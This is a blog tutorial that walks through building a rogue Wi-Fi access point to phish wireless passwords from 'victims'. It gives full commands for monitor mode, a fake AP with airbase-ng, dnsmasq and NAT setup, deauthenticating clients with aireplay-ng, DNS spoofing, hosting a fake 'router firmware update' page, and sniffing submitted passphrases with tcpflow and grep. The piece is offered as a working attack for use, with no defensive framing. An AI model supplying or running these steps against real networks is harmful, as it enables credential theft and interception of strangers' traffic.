by hash3liZer . 20 June 2018
In this tutorial, I'll make you understand the basics of Rogue Access Point and how one can use it to sneak the target details by targetting clients, not the Access Point. Whatever, brute-forcing and Cracking tough they are good enough to crack passwords using tables and dictionaries but they couldn't provide the credibility of a Fake Access Point. So, that's where the Phishing comes handy, well by forging a network, a little nasty.
Phishing's always seemed like one of the most naive means of getting your hands on someone's data. But in this case, this would be a little harder as we will see so. So, how does this works basically?
Phishing as always said in a manner is to influence someone to perform involuntary tasks. While Rogue Network has nothing in particular. They are just simple (wireless) networks with the most basic functionality and most importantly with a forged document where the whole of the network traffic is redirected. So, the basics are is to somehow show our victims this document, no matter what kind of document it is.
Now from Wiki, it is a wireless access point without the authorization of an administrator, employed by an attacker or a well-meaning employee.
In our case, What we have to do in summary is: First, we will launch the Wireless Access point, a simple one. Then we will define the traffic routing and if necessary forward the Internet traffic. After which it's all the matter of hosting a phishing site and induce the clients to interact with it. I hope you got the picture until now. A brief explanation with a picture:
Before you take a head-start. You will be required an Internet connection for some packages to download. Moreover, i am using Kali for all the testing and implementation. So, it would be better if you have Kali installed. Well, if you have Ubuntu or another Linux operating system, then just installing the required packages would be a little different but the process almost remains the same.
First, we will install the required packages which in our case is just one, dnsmasq. Other important packages are apache2, airbase-ng, MySQL. If you are kali user, you will have these packages already installed besides dnsmasq. So,
apt-get install dnsmasq
Now, we need a wireless Card that supports promiscous mode and packet injection. Search for your adapter interface and put it in monitor mode. In my case interface is wlan1. So,
To, put it in monitor mode:
airmon-ng start wlan1
This will put your wireless card in monitor mode and rename it from wlan1 to wlan1mon
Launch the wireless Access Point with airbase-ng which is included in the airmon-ng utility. This allows users to host APs with or without procotols and help them test various vulnerable versions of employed security. Usage:
airbase-ng --essid "Access Point" -c 6 -P -vv wlan1mon
Note the above arguments:
Airbase-ng setups a new tapped interface atN, where N is a positive integer which then further is used to manage the network instead of wlanNmon interface.
Now, we have to define routing tables and traffic information for the access point. So, that data could flow in the network and we be able to develop connections with other clients or vice virsa. We have dnsmasq for this part. Setup a new configuration file for dnsmasq with name dnsmasq.conf and copy/paste the below code.
sudo nano dnsmasq.conf
interface=at0 dhcp-range=192.168.1.2,192.168.1.30,255.255.255.0,12h dhcp-option=3,192.168.1.1 dhcp-option=6,192.168.1.1 server=184.108.40.206 log-queries log-dhcp listen-address=127.0.0.1
Note these paramters in the above instructions.
sudo dnsmasq -C dnsmasq.conf -d
Assign the network Gateway and netmask to the interface and add the routing table.
ifconfig at0 up 220.127.116.11 netmask 255.255.255.0 route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1
Now, this is optional. This is to provide our victims Internet Access. So, clients could use it as a usual network and you could passively perform ill-natured attacks. MITM and other attacks like ARP spoofing, DNS spoofing could be easily possible by providing clients internet access. Change some firewall rules and allow traffic forwarding:
iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE iptables --append FORWARD --in-interface at0 -j ACCEPT
Note these two parameters in the last two commands:
Now, just one step to go..
echo 1 > /proc/sys/net/ipv4/ip_forward
Now, what's remaining is the site. Well, it's better to keep the code and scope minimal. I'll try to make things much simpler as i can. What we will do is host a site at first on apache web server. This site somehow would be presented to user, i.e. the target. Well, the main thing is getting what's entered in the fields. We will see the real jargon in the subsequent steps. But for now, let's stick to the site. Download this phishing site:
Unzip the file which will give you a folder by the name RogueAP. Move all of this folder files to apache default hosting directory:
rm -rf /var/www/html/* unzip rogueap.zip -d /var/www/html
Kick-Start apache service:
systemctl start apache2
Make sure if it started successfully:
service apache2 status
To ensure that the site is hosted perfectly, navigate to the link 192.168.1.1 and make sure if you are able to see the site. Screenshot of how it will look is given below:
Now, we have to sniff the data that will be posted along the headers to apache server. But before that we will spoof all the received requests to the site for maximum effect. Use dnsspoof:
dnsspoof -i at0
Note that this will only work for non-HSTS sites or those which are not yet visited by the browser. So, the only thing now is tracking the passwords. For which we will use tcpflow. Type in the following command:
sudo tcpflow -i any -C -g port 80 | grep -i "password1="
What's happening here is, we are getting whole the traffic travelling in the network. From this traffice, sure we don't need any data except that one POST request to the local site which contains the passwords. Here, tcpflow is capturing the request data and piping the output to grep which is filtering the output to find the line with password1=.
Now, you can dissociate your target clients and force them to connect your Rogue AP. To dissociate, we will use aireplay-ng.
$ aireplay-ng -00 -a [BSSID of AP] [Interface]
A successful attack...
Coming on to the victim side, suppose that victim's already connected to the Rogue AP and is redirected to Phishing site which makes him know that his router's firmware is out-of-date and requires update. As soon, she enter's the data in password fields and send it to server, we will be notified on the tcpflow terminal:
So, the required WPA passphrase is password123.
So, we saw what is a Fake (Rogue) access point and how one can use it to steal someone's data on the fly. Well, Rogue access points are sometimes difficult to maintain and setup for because you wisely have to choose your wireless adapter and it demands a little knowledge of yours about network and servers. Whatever, in this tutorial, we saw just the minimal usage of it. For more keep reading and subscribe to our email newsletter.